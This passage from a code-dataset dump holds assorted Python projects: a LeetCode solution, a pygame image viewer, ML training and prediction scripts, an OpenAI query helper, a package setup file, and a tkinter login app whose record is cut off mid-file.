Solution().numUniqueEmails([\"test.email+alex@leetcode.com\",\"test.e.mail+bob.cathy@leetcode.com\",\"testemail+david@lee.tcode.com\"]))\r\nprint(2 == Solution().numUniqueEmails([\"test.email+alex@leetcode.com\",\"test.email.leet+alex@code.com\"]))\r\n\r\nprint('elapse time: {} sec'.format(time.time() - stime))","repo_name":"roiei/algo","sub_path":"leet_code/929. Unique Email Addresses.py","file_name":"929. Unique Email Addresses.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"23907349008","text":"#!/usr/bin/env python\n\nimport Image\n\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\n\ndef view(ims, names = None):\n import pygame\n pygame.init()\n\n sw, sh = pygame.display.list_modes()[0]\n\n im = ims[0]\n width,height = im.size\n\n # Target size is 90% of sw\n zf = min(0.9 * sw / im.size[0], 0.6 * sh / im.size[1])\n\n ww = int(width * zf)\n size = width * zf,height * zf\n y0 = int(height * zf)\n y1 = int(height * zf + 40)\n\n screen = pygame.display.set_mode((ww, y1 + ww))\n\n fo = pygame.font.SysFont(\"freemono\", 20)\n\n pygame.key.set_repeat(300, 50)\n\n screen.fill(black)\n def mainpic(im):\n b = pygame.image.fromstring(im.convert(\"RGB\").tostring(), im.size, \"RGB\")\n return pygame.transform.scale(b, (int(zf * width), int(zf * height)))\n mp = mainpic(im)\n\n def announce(ss):\n for i,s in enumerate(ss):\n msg = fo.render(s, False, (255,255,255,128), (0,0,0,128))\n screen.blit(msg, (0, y0 + 20 * i))\n del msg\n\n (x, y) = (0, 0)\n (px, py) = (None, None)\n z = 7\n redraw = True\n while True:\n if redraw:\n screen.blit(mp, (0,0))\n if x < im.size[0] and y < im.size[1]:\n pixel = im.getpixel((x, y))\n if len(pixel) == 3:\n (r, g, b) = pixel\n a = 255\n elif len(pixel) == 4:\n (r, g, b, a) = pixel\n if names is None:\n fn = str(ims.index(im))\n else:\n fn = names[ims.index(im)]\n pixval = \" \".join([\"%s=%02x\" % (c, v) for (c, v) in zip(im.mode, pixel)])\n announce([\"xy=%4d,%4d (%d %d) %-16s\" % (x, y, im.size[0], im.size[1], fn),\n pixval + \" \"])\n sub = im.crop((x - z/2, y - z/2, x + 1 + z/2, y + 1 + z/2))\n imsub = pygame.transform.scale(pygame.image.fromstring(sub.convert(\"RGB\").tostring(), sub.size, \"RGB\"), (ww, ww))\n screen.blit(imsub, (0, y1))\n for i in range(1, z):\n pygame.draw.line(screen, black, (0, y1 + ww * i / z), (ww, y1 + ww * i / z))\n pygame.draw.line(screen, black, (ww * i / z, y1), (ww * i / z, y1 + ww))\n x0 = ww * (z / 2) / z\n x1 = ww * (z / 2 + 1) / z\n corners = [\n (x0, y1 + x0),\n (x1, y1 + x0),\n (x1, y1 + x1),\n (x0, y1 + x1)]\n pygame.draw.lines(screen, white, True, corners, 2)\n (px, py) = (x, y)\n pygame.display.flip()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n if event.type == pygame.KEYDOWN:\n if event.key == 27 or event.key == ord('q'):\n pygame.display.quit()\n return\n if event.key == ord(' '):\n i = ims.index(im)\n i = (i + 1) % len(ims)\n im = ims[i]\n mp = mainpic(im)\n redraw = True\n if event.key == ord('-'):\n z += 2\n redraw = True\n if event.key == ord('='):\n z -= 2\n redraw = True\n if event.type == pygame.MOUSEMOTION:\n (x, y) = [int(c / zf) for c in event.pos]\n if (x, y) != (px, py):\n redraw = True\n\nif __name__ == '__main__':\n import sys\n ims = [Image.open(a) for a in sys.argv[1:]]\n view(ims, sys.argv[1:])\n","repo_name":"jamesbowman/mysettings","sub_path":"iv.py","file_name":"iv.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"28204387215","text":"import joblib\nfrom random import randint\nfrom matplotlib import pyplot\nimport numpy as np\nfrom dataset import load_dataset\n\n# Idea\n# 1. load datasets\n# 2. load model\n# 3. pick a random image from test dataset\n# 4. predict\n\nTRAIN_X = 'train_x.npz'\nTRAIN_Y = 'train_y.npz'\nTEST_X = 'test_x.npz'\nTEST_Y = 'test_y.npz'\nMODAL_NAME = 'operators_svm_model.gz'\n\ndef load_test_dataset():\n \"\"\" \n load and returns testing dataset and labels \n returns : test_x, test_y (all numpy arrays)\n \"\"\"\n test_x = load_dataset(TEST_X)\n test_y = load_dataset(TEST_Y)\n return test_x, test_y\n\ndef pre_processing(test_x):\n \"\"\" \n process test_x by convering int to float & normalizing pixels values to the range on 0-1 \n parameters : test_x (numpy array)\n returns : test_norm (numpy array)\n \"\"\"\n test_norm = test_x.astype('float32')\n test_norm = test_norm / 255.0\n return test_norm\n\ndef main():\n test_x, test_y = load_test_dataset()\n test_x = pre_processing(test_x)\n\n index = randint(0,test_x.shape[0])\n \n classifier = joblib.load(MODAL_NAME)\n result = classifier.predict([test_x[index]])\n \n # converting a 1d array array to 2d array\n image_1d = np.array(test_x[index])\n image_2d = image_1d.reshape(28,28)\n pyplot.imshow(image_2d)\n \n print('actual :',test_y[index])\n print('predicted :',result[0])\n\nif __name__ == \"__main__\" :\n main()","repo_name":"nithyashrie/CAPSTONE","sub_path":"src/operators/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5628016217","text":"# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport argparse\r\nimport PIL.Image\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\n\r\nimport torch\r\nfrom torchvision import transforms\r\nfrom torch.utils.data import Dataset\r\nfrom torch.utils.data import DataLoader\r\n\r\nimport architecture as models\r\nfrom utils.util import save_result_image\r\nfrom utils.util_loc import get_cam_target_class, resize_threshold_cam\r\n\r\n\r\nIMAGE_MEAN_VALUE = [0.485, 0.456, 0.406]\r\nIMAGE_STD_VALUE = [0.229, 0.224, 0.225]\r\n\r\n\r\nmodel_names = sorted(name for name in models.__dict__\r\n if name.islower() and not name.startswith(\"__\")\r\n and callable(models.__dict__[name]))\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')\r\n parser.add_argument('--log-folder', type=str, default='train_log')\r\n parser.add_argument('--data', help='path to dataset')\r\n parser.add_argument('--arch', choices=model_names)\r\n parser.add_argument('-b', '--batch-size', default=32, type=int)\r\n parser.add_argument('--resume', default=None, type=str)\r\n parser.add_argument('--gpu', default=0, type=int, help='GPU id to use.')\r\n\r\n parser.add_argument('--name', type=str, default='test_case')\r\n\r\n parser.add_argument('--dataset', type=str, default='PASCAL', )\r\n parser.add_argument('--test-list', type=str, default='./datalist/PascalVOC/val.txt')\r\n\r\n parser.add_argument('--resize-size', type=int, default=321, help='input resize size')\r\n args = parser.parse_args()\r\n\r\n return args\r\n\r\n\r\n\r\ndef main():\r\n args = get_args()\r\n if args.gpu is not None:\r\n print(\"Use GPU: {} for training\".format(args.gpu))\r\n\r\n num_classes = 20\r\n\r\n # Select Model & Method\r\n model = models.__dict__[args.arch](False, num_classes=num_classes)\r\n\r\n if args.gpu is not None:\r\n torch.cuda.set_device(args.gpu)\r\n model = model.cuda(args.gpu)\r\n\r\n # optionally resume from a checkpoint\r\n if args.resume:\r\n checkpoint = torch.load(args.resume)['state_dict']\r\n model.load_state_dict(checkpoint, strict=True)\r\n\r\n test_loader = data_loader(args)\r\n evaluate_test(test_loader, model, args)\r\n\r\n\r\ndef evaluate_test(val_loader, model, args):\r\n\r\n model.eval()\r\n with torch.no_grad():\r\n for i, (images, image_id, image_sizes) in enumerate(tqdm(val_loader, desc='Evaluate')):\r\n images = images.cuda(args.gpu, non_blocking=True)\r\n\r\n output = model(images)\r\n cam = get_cam_target_class(model)\r\n cam = cam.cpu().numpy().transpose(0, 2, 3, 1)\r\n\r\n for j in range(cam.shape[0]):\r\n cam_ = resize_threshold_cam(cam[j],\r\n size=(image_sizes[j][0].item(), image_sizes[j][1].item()),\r\n thresh=0.3)\r\n cam_max = np.argmax(cam_, axis=2)\r\n\r\n save_result_image('final_map', cam_max, image_id[j], args)\r\n\r\n\r\ndef data_loader(args):\r\n\r\n # transforms for validation dataset\r\n transforms_val = transforms.Compose([\r\n transforms.Resize((args.resize_size, args.resize_size)),\r\n transforms.ToTensor(),\r\n transforms.Normalize(IMAGE_MEAN_VALUE, IMAGE_STD_VALUE),\r\n ])\r\n test_loader = DataLoader(\r\n VOCTestDataset(root=args.data, datalist=args.test_list, transform=transforms_val),\r\n batch_size=args.batch_size, shuffle=False, num_workers=4\r\n )\r\n return test_loader\r\n\r\n\r\nclass VOCTestDataset(Dataset):\r\n\r\n def __init__(self, root=None, datalist=None, transform=None):\r\n self.root = root\r\n datalist = open(datalist).read().splitlines()\r\n self.image_names = [img_gt_name.split(' ')[0][-15:-4] for img_gt_name in datalist]\r\n self.transform = transform\r\n\r\n def __len__(self):\r\n return len(self.image_names)\r\n\r\n def __getitem__(self, idx):\r\n name = self.image_names[idx]\r\n\r\n image_path = os.path.join(self.root, \"JPEGImages\", name + '.jpg')\r\n img = PIL.Image.open(image_path).convert(\"RGB\")\r\n img_size = img.size\r\n if self.transform:\r\n img = self.transform(img)\r\n\r\n return img, name, img_size\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"bityangke/SW_Project","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"10697719330","text":"import hashlib\nimport string\nimport random\n\n\ndef id_generator(size=6, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\nloop = True\ncount = 0\n\nprint(\"Υπολογίζεται ο μέσος όρος παρακαλώ περιμένετε...\")\nfor x in range(0, 19):\n\n loop = True\n while loop:\n result = hashlib.sha256(id_generator().encode('utf-8')).hexdigest()\n firstTwo = result[:2]\n lastThree = result[-3:]\n count += 1\n if firstTwo == \"a3\" and lastThree == \"fff\":\n loop = False\n\nprint(count / 20)\n","repo_name":"master1324/ergasia_python","sub_path":"askisi 7.py","file_name":"askisi 7.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"23425185330","text":"__author__ = 'Urokhtor'\n\nfrom Controllers.FormController import FormController\nfrom Tools.JSONFrontEndTool import JSONFrontEndTool as JFET\nfrom Tools.FrontEndElementTool import FrontEndElementTool as FEET\nfrom Tools.TypeMapper import TypeMapper\n\nimport json\n\nclass TaskManagementFormController(FormController):\n\n def handleRequest(parent, request, response):\n \"\"\"\n\n \"\"\"\n\n f = open(\"Conf/Website/taskmanagementform.json\", \"r\")\n tmp = json.load(f)\n f.close()\n\n tasks = parent.taskManager.getAll()\n\n if tasks is None: return json.dumps(tmp)\n\n task = None\n deviceId = None\n actionType = None\n\n if \"params\" in request and \"id\" in request[\"params\"]:\n task = parent.taskManager.getById(int(request[\"params\"][\"id\"]))\n\n if task:\n # Add the chosen sensor's data to the sensor info table.\n JFET.addParameter(JFET.findElementById(tmp[\"source\"], \"taskName\"), \"value\", task[\"name\"])\n deviceId = task[\"deviceid\"]\n actionType = task[\"action\"]\n JFET.addParameter(JFET.findElementById(tmp[\"source\"], \"taskEvents\"), \"value\", \" \".join(task[\"schedules\"]))\n JFET.addParameter(JFET.findElementById(tmp[\"source\"], \"taskIsPermanent\"), \"checked\", task[\"ispermanent\"])\n taskId = JFET.findElementById(tmp[\"source\"], \"taskId\")\n JFET.addParameter(taskId, \"value\", str(task[\"id\"]))\n\n else:\n JFET.addParameter(JFET.findElementById(tmp[\"source\"], \"taskIsPermanent\"), \"checked\", True)\n JFET.addParameter(JFET.findElementById(tmp[\"source\"], \"removeSendbutton\"), \"disabled\", \"true\")\n\n taskDevice = JFET.findElementById(tmp[\"source\"], \"taskDevice\")\n FEET.createSelectMap(taskDevice, parent.deviceManager.getIdNameMap(), deviceId)\n\n taskAction = JFET.findElementById(tmp[\"source\"], \"taskAction\")\n FEET.createSelectMap(taskAction, TypeMapper.getTaskActionMap(), actionType)\n\n return json.dumps(tmp)\n\n def validate(parent, request, reject):\n form = request[\"params\"][\"form\"]\n form[\"taskAction\"] = int(form[\"taskAction\"])\n form[\"taskDevice\"] = int(form[\"taskDevice\"])\n if len(form[\"taskId\"]) > 0: form[\"taskId\"] = int(form[\"taskId\"])\n\n def handleSubmit(parent, request, response):\n form = request[\"params\"][\"form\"]\n\n if request[\"params\"][\"mode\"] == \"save\":\n name = form[\"taskName\"]\n taskType = \"write\"\n action = form[\"taskAction\"]\n device = form[\"taskDevice\"]\n isTemporary = form[\"taskIsPermanent\"]\n schedules = form[\"taskEvents\"]\n\n task = parent.taskManager.create(name, taskType, action, device, isTemporary, schedules)\n return json.dumps(parent.taskManager.insert(task))\n\n elif request[\"params\"][\"mode\"] == \"remove\":\n return json.dumps(parent.taskManager.remove(parent.taskManager.getById(form[\"taskId\"])))","repo_name":"Urokhtor/Naga-Automation-Suite","sub_path":"Naga Automation Suite/Controllers/TaskManagementFormController.py","file_name":"TaskManagementFormController.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"10071277514","text":"from turtle import down, forward\nimport torch\nfrom torch import flatten, nn\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets #CIFAR,COCO...\nfrom torchvision.transforms import ToTensor, Lambda, Compose\nimport matplotlib.pyplot as plt\n\ntraining_data = datasets.FashionMNIST(\n root = \"data\",\n train = True,\n download = True,\n transform = ToTensor()\n)\n\ntest_data = datasets.FashionMNIST(\n root = \"data\",\n train = False,\n download = True,\n transform = ToTensor(),\n)\n\nprint(\":: Dataset allocate ::\")\n\nbatch_size = 64\n\n#Data Loader Create -> Dataste을 순환 가능한 객체로 만든다.\n\ntrain_dataloader = DataLoader(training_data, batch_size=batch_size)\ntest_dataloader = DataLoader(test_data, batch_size= batch_size)\n\n# print(\"======Iteration======\")\n# for X, y in test_dataloader:\n# print(\"Sahpe of X [N,C,H,W]: \", X.shape)\n# print(\"Shape of y: \", y.shape, y.dtype)\n# print(\"======End======\")\n\n#학습에 필요한 CPU, GPU 장치를 얻는다.\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nprint(f\"Using {device} device\")\n\n#모델 정의하기\nclass NeuralNetwork(nn.Module):\n def __init__(self):\n super(NeuralNetwork, self).__init__()\n self.flatten = nn.Flatten()\n self.linear_relu_stack = nn.Sequential(\n nn.Linear(28*28, 512),\n nn.ReLU(),\n nn.Linear(512, 512),\n nn.ReLU(),\n nn.Linear(512, 10)\n )\n\n def forward(self, x):\n x = self.flatten(x)\n logits = self.linear_relu_stack(x)\n return logits\n \nmodel = NeuralNetwork().to(device)\nprint(model)\n\n\n#모델 매개변수 최적화 하기\nloss_fn = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(model.parameters(), lr=1e-3)\n\ndef train(dataloader, model, loss_fn, optimizer):\n size = len(dataloader.dataset)\n for batch, (X, y) in enumerate(dataloader):\n X, y = X.to(device), y.to(device)\n\n #예측 오류 계산\n pred = model(X)\n loss = loss_fn(pred, y)\n \n #역전파\n optimizer.zero_grad() #모델 매개변수의 변화도를 재설정, 기본적으로 변화도는 더해지기(add up) 때문에, 중복계산을 막기 위해서 반복할때마다 명시적으로 0으로 설정해야한다.\n loss.backward() #loss에 대한 requires_grad가 True인 변수의 변화량 값 계산.\n optimizer.step() #변화도를 계산한 뒤에 해당 함수를 호출하면 수집된 변화도로 매개변수를 조정한다.\n \n if batch % 100 == 0:\n loss, current = loss.item(), batch * len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n\n\ndef test(dataloader, model, loss_fn):\n size = len(dataloader.dataset)\n num_batchs = len(dataloader)\n model.eval()\n test_loss, correct = 0,0\n with torch.no_grad(): #연산 중에서 gradient를 계산하는 기록 추적, 변화도 계산 지원이 필요 없는 경우 사용 (연산추적 중지)\n for X, y in dataloader:\n X,y = X.to(device), y.to(device)\n pred = model(X)\n test_loss += loss_fn(pred, y).item()\n correct += (pred.argmax(1) == y).type(torch.float).sum().item() #배치 안에 정답인 거 전부다 sum\n test_loss /= num_batchs\n correct /= size\n print(f\"Test Error: \\n Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \\n\")\n\n\nepoch = 10\nfor t in range(epoch):\n print(f\"Epoch {t+1}\\n------------------------\")\n train(train_dataloader, model, loss_fn, optimizer)\n test(test_dataloader, model, loss_fn)\nprint(\"Done!\")\n\n#모델 저장하기\ntorch.save(model.state_dict(), \"model.pth\")\nprint(\"Saved Pytorch Model State to model.pth\")\n\n#모델 불러오기\nmodel = NeuralNetwork()\nmodel.load_state_dict(torch.load(\"model.pth\"))\n\n\n#모델을 이용하여 예측\nclasses = [\n \"T-shirt/top\",\n \"Trouser\",\n \"Pullover\",\n \"Dress\",\n \"Coat\",\n \"Sandal\",\n \"Shirt\",\n \"Sneaker\",\n \"Bag\",\n \"Ankle boot\",\n]\n\nmodel.eval()\nx, y = test_data[0][0], test_data[0][1]\nwith torch.no_grad():\n pred = model(x)\n predicted, actual = classes[pred[0].argmax(0)], classes[y]\n print(f'Predicted: \"{predicted}\", Actual: \"{actual}\"')","repo_name":"gbjeong96/experimentset","sub_path":"Tutorial/QuickStart.py","file_name":"QuickStart.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72598144115","text":"import openai\nimport time\nimport threading\nfrom contextlib import contextmanager\n\n# get an openai api key from here: https://platform.openai.com/account/api-keys\nopenai.api_key = \"\"\n\ndef rm_return_doublequote(s):\n s = s.replace('\\n\\n', ' ')\n s = s.replace('\\n', ' ')\n s = s.replace('\\\"', '')\n return s.strip()\n\nclass TimeoutException(Exception):\n def __init__(self, msg=''):\n self.msg = msg\n\n@contextmanager\ndef time_limit(seconds, msg=''):\n \n timer = threading.Timer(seconds, lambda: _thread.interrupt_main())\n timer.start()\n try:\n yield\n except KeyboardInterrupt:\n raise TimeoutException(\"Timed out for operation {}\".format(msg))\n finally:\n # if the action ends in specified time, timer is canceled\n timer.cancel()\n\n# engine selection:\n# optimized for dialogue: gpt-3.5-turbo\t\n# single-turn instructions: text-davinci-003\n# expert model but expensive: gpt-4\ndef query_openai(inputs_with_prompts, \n engine='text-davinci-002', # $0.0200 / 1K tokens\n max_tokens=500, \n num_sequence=1, \n temp=0,\n retry=2):\n \n completions = {\"choices\": []}\n complete = False\n for i in range(retry):\n try:\n with time_limit(20, 'run gpt-3'):\n completions = openai.Completion.create(\n engine=engine, \n max_tokens=max_tokens, \n prompt=inputs_with_prompts, \n temperature=temp, \n n=num_sequence, # num of returned sequence\n )\n complete = True\n break\n except:\n time.sleep(2)\n if not complete:\n return False\n\n outputs = [c[\"text\"] for c in completions[\"choices\"]]\n \n return outputs\n \ndef answer_question(question, simulation_data, retry=2):\n \n numFails = 0\n while numFails < retry:\n ret = query_openai(f'Read the following json format file and reply the question. \\n\\n question: {question} \\n\\n simulation: {simulation_data}')\n if ret == False:\n numFails += 1\n else:\n break\n if ret == False:\n return f'Due to API limitations, please reduce the number of simulation rounds when asking questions as the simulated data has exceeded the cache capacity.'\n \n if type(ret) == list:\n ret = ret[0]\n \n ret = rm_return_doublequote(ret)\n return ret\n \nif __name__ == '__main__':\n simulation_data = \"{\\\n \\\"simulation_1\\\": [\\\n {\\\"time\\\": \\\"0\\\", \\\"speed\\\": \\\"0\\\"},\\\n {\\\"time\\\": \\\"1\\\", \\\"speed\\\": \\\"30\\\"},\\\n {\\\"time\\\": \\\"2\\\", \\\"speed\\\": \\\"60\\\"},\\\n {\\\"time\\\": \\\"3\\\", \\\"speed\\\": \\\"90\\\"},\\\n {\\\"time\\\": \\\"4\\\", \\\"speed\\\": \\\"120\\\"},\\\n {\\\"time\\\": \\\"5\\\", \\\"speed\\\": \\\"150\\\"},\\\n {\\\"time\\\": \\\"6\\\", \\\"speed\\\": \\\"180\\\"},\\\n {\\\"time\\\": \\\"7\\\", \\\"speed\\\": \\\"210\\\"},\\\n {\\\"time\\\": \\\"8\\\", \\\"speed\\\": \\\"240\\\"},\\\n {\\\"time\\\": \\\"9\\\", \\\"speed\\\": \\\"270\\\"},\\\n {\\\"time\\\": \\\"10\\\", \\\"speed\\\": \\\"300\\\"},\\\n {\\\"time\\\": \\\"11\\\", \\\"speed\\\": \\\"330\\\"},\\\n {\\\"time\\\": \\\"12\\\", \\\"speed\\\": \\\"360\\\"},\\\n {\\\"time\\\": \\\"13\\\", \\\"speed\\\": \\\"390\\\"},\\\n {\\\"time\\\": \\\"14\\\", \\\"speed\\\": \\\"420\\\"}\\\n ],\\\n \\\"simulation_2\\\": [\\\n {\\\"time\\\": \\\"0\\\", \\\"speed\\\": \\\"0\\\"},\\\n {\\\"time\\\": \\\"1\\\", \\\"speed\\\": \\\"40\\\"},\\\n {\\\"time\\\": \\\"2\\\", \\\"speed\\\": \\\"80\\\"},\\\n {\\\"time\\\": \\\"3\\\", \\\"speed\\\": \\\"120\\\"},\\\n {\\\"time\\\": \\\"4\\\", \\\"speed\\\": \\\"160\\\"},\\\n {\\\"time\\\": \\\"5\\\", \\\"speed\\\": \\\"200\\\"},\\\n {\\\"time\\\": \\\"6\\\", \\\"speed\\\": \\\"240\\\"},\\\n {\\\"time\\\": \\\"7\\\", \\\"speed\\\": \\\"280\\\"},\\\n {\\\"time\\\": \\\"8\\\", \\\"speed\\\": \\\"320\\\"},\\\n {\\\"time\\\": \\\"9\\\", \\\"speed\\\": \\\"360\\\"},\\\n {\\\"time\\\": \\\"10\\\", \\\"speed\\\": \\\"400\\\"},\\\n {\\\"time\\\": \\\"11\\\", \\\"speed\\\": \\\"440\\\"},\\\n {\\\"time\\\": \\\"12\\\", \\\"speed\\\": \\\"480\\\"},\\\n {\\\"time\\\": \\\"13\\\", \\\"speed\\\": \\\"520\\\"},\\\n {\\\"time\\\": \\\"14\\\", \\\"speed\\\": \\\"560\\\"}\\\n ],\\\n \\\"simulation_3\\\": [\\\n {\\\"time\\\": \\\"0\\\", \\\"speed\\\": \\\"0\\\"},\\\n {\\\"time\\\": \\\"1\\\", \\\"speed\\\": \\\"50\\\"},\\\n {\\\"time\\\": \\\"2\\\", \\\"speed\\\": \\\"100\\\"},\\\n {\\\"time\\\": \\\"3\\\", \\\"speed\\\": \\\"150\\\"},\\\n {\\\"time\\\": \\\"4\\\", \\\"speed\\\": \\\"200\\\"},\\\n {\\\"time\\\": \\\"5\\\", \\\"speed\\\": \\\"250\\\"},\\\n {\\\"time\\\": \\\"6\\\", \\\"speed\\\": \\\"300\\\"},\\\n {\\\"time\\\": \\\"7\\\", \\\"speed\\\": \\\"350\\\"},\\\n {\\\"time\\\": \\\"8\\\", \\\"speed\\\": \\\"400\\\"},\\\n {\\\"time\\\": \\\"9\\\", \\\"speed\\\": \\\"450\\\"},\\\n {\\\"time\\\": \\\"10\\\", \\\"speed\\\": \\\"500\\\"},\\\n {\\\"time\\\": \\\"11\\\", \\\"speed\\\": \\\"550\\\"},\\\n {\\\"time\\\": \\\"12\\\", \\\"speed\\\": \\\"600\\\"},\\\n {\\\"time\\\": \\\"13\\\", \\\"speed\\\": \\\"650\\\"},\\\n {\\\"time\\\": \\\"14\\\", \\\"speed\\\": \\\"700\\\"}\\\n ]\\\n }\"\n print(answer_question('List the average of maximum speed in recent three runs.', simulation_data))\n # answer should be \"The average of maximum speed in recent three runs is 400.\"\n \n \n","repo_name":"weilun-chiu/gpt-3.5-turbo-instruct-story-generation","sub_path":"story_generator.py","file_name":"story_generator.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"5882250897","text":"from sys import version_info, exit\nfrom setuptools import setup, find_packages\nfrom os import path\n\nif version_info[0] < 3 and version_info[1] < 5:\n exit(\"Sorry, support only for Python 3.5 and above.\")\n\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name=\"tornado-razorpay\",\n version=\"0.1.3\",\n description=\"Razorpay Asynchronous Tornado Python Client\",\n url=\"https://github.com/nkanish2002/tornado-razorpay\",\n author=\"Anish Gupta\",\n author_email=\"nkanish2002@gmail.com\",\n license=\"MIT\",\n install_requires=[\"tornado>4\"],\n package_dir={'tornado_razorpay': 'tornado_razorpay'},\n packages=find_packages(),\n keywords='razorpay payment gateway india tornado async',\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ]\n)\n","repo_name":"nkanish2002/tornado-razorpay","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20794085506","text":"from tkinter import *\nfrom tkinter import ttk\nfrom PIL import ImageTk, Image\nfrom tkhtmlview import HTMLLabel\nfrom tkinter import messagebox\nimport random\n# test\nfrom sheetScrape import importList\nimport back as b\n\n\nglobal_name = ''\nuser_info = {}\n\n#Stores user info in tuples of name and password...\nuserList = []\n\n#Test Values for until Garrett finishes Backend...\ntestName = \"Jake\"\ntestPwd = \"123\"\ntestRatings = [1, 2, 3, 4, 5]\ntestSource = \"kutasoftware.com\"\ntestTokens = 13\n\n#Main program...\nroot = Tk()\nroot.title('Sheet Search')\nroot.iconbitmap('9iRb8Xq6T.ico')\nroot.geometry(\"200x200\")\n\n#For errors...\nsigninError = \"Incorrect username or password.\"\nsignupError = \"Please make sure passwords match.\"\ndef popup(error):\n messagebox.showerror(\"Oops!\", error)\n return\n\n#For getting rid of a window...\ndef exitProgram(root):\n root.destroy()\n return\n\n#For opening login page...\ndef openLogin():\n top = Toplevel()\n top.title('Login Page')\n top.geometry(\"700x600\")\n #Make frame for login...\n loginFrame = LabelFrame(top, padx=50, pady=50)\n loginFrame.pack(padx=100, pady=100)\n\n #Populate loginFrame w/ Labels...\n userLabel = Label(loginFrame, text=\"Username: \")\n pwdLabel = Label(loginFrame, text=\"Password: \")\n\n userLabel.grid(row=0, column=0)\n pwdLabel.grid(row=1, column=0)\n\n #Populate loginFrame w/ Input Bars...\n userEntry = Entry(loginFrame)\n pwdEntry = Entry(loginFrame)\n\n userEntry.grid(row=0, column=3)\n pwdEntry.grid(row=1, column=3)\n\n #Populate loginFrame w/ Submit Button...\n submitButton = Button(loginFrame, text=\"Submit\", command = lambda: [submitInfo(userEntry, pwdEntry, top)])\n submitButton.grid(row=2, column=2)\n\n #Make frame for new users...\n newbieFrame = LabelFrame(top, padx=10, pady=10)\n newbieFrame.pack(padx=20, pady=20)\n\n #Populate newbieFrame w/ Label...\n registerLabel = Label(newbieFrame, text=\"New to SheetSearch?\")\n registerLabel.pack()\n\n #Populate newbieFrame w/ Register Button...\n registerButton = Button(newbieFrame, text=\"Sign Up\", command= lambda: [signUp0(), exitProgram(top)])\n registerButton.pack(padx=10, pady=10)\n\n return\n\n#For submitting info...\ndef submitInfo(name, pwd, root):\n global global_name\n username = name.get()\n exists = not(b.isNameFree(username, '.txt'))\n password = pwd.get()\n\n print(exists)\n\n if exists:\n is_right = b.checkPassword(username, password)\n if is_right:\n openHomePage()\n root.destroy()\n return\n \n popup(signinError)\n root.destroy()\n global_name = name\n openLogin()\n\n\n#For signing up...\ndef signUp0():\n\n top = Toplevel()\n top.title('Registration')\n top.geometry(\"700x500\")\n\n #Make frame for login...\n registrationFrame = LabelFrame(top, padx=50, pady=50)\n registrationFrame.pack(padx=100, pady=100, expand=True)\n\n #Populate loginFrame w/ Labels...\n userLabel = Label(registrationFrame, text=\"Enter username: \").grid(row=0, column=0)\n pwdLabel = Label(registrationFrame, text=\"Enter password: \").grid(row=1, column=0)\n confPwdLabel = Label(registrationFrame, text=\"Confirm password: \").grid(row=2, column=0)\n\n #Populate loginFrame w/ Input Bars...\n userEntry = Entry(registrationFrame)\n pwdEntry = Entry(registrationFrame)\n confPwdEntry = Entry(registrationFrame)\n\n userEntry.grid(row=0, column=3)\n pwdEntry.grid(row=1, column=3)\n confPwdEntry.grid(row=2, column=3)\n\n registrationButton = Button(registrationFrame, text=\"Continue\", command= lambda: [enterInfo(userEntry.get(), pwdEntry.get(), confPwdEntry.get()), exitProgram(top)])\n registrationButton.grid(row=3, column=2)\n\n #return\n\n #For registering users and storing their info...\n def enterInfo(name, pwd, cpwd):\n global user_info\n global global_name\n if not(b.isNameFree(name, '.txt')):\n popup(\"That username is already taken!\")\n signUp0()\n return\n # if password matches in both boxes\n if pwd != cpwd:\n popup(signupError)\n signUp0()\n return\n\n #userTuple = (name, pwd)\n #userList.append(userTuple) #BACKEND: Store tuple as user file...\n global_name = name\n user_info['username'] = name\n user_info['pwd'] = pwd\n signUp1()\n \ndef signUp1():\n top = Toplevel()\n top.title('Registration1')\n top.geometry(\"700x500\")\n\n #Make frame for login...\n registrationFrame = LabelFrame(top, padx=50, pady=50)\n registrationFrame.pack(padx=100, pady=100, expand=True)\n\n # add another data filed to this list and label will be created and its entry will be passed to function to be written to .txt file\n fields = [\"age\", \"pronouns\", \"school\"]\n entries = []\n for i in 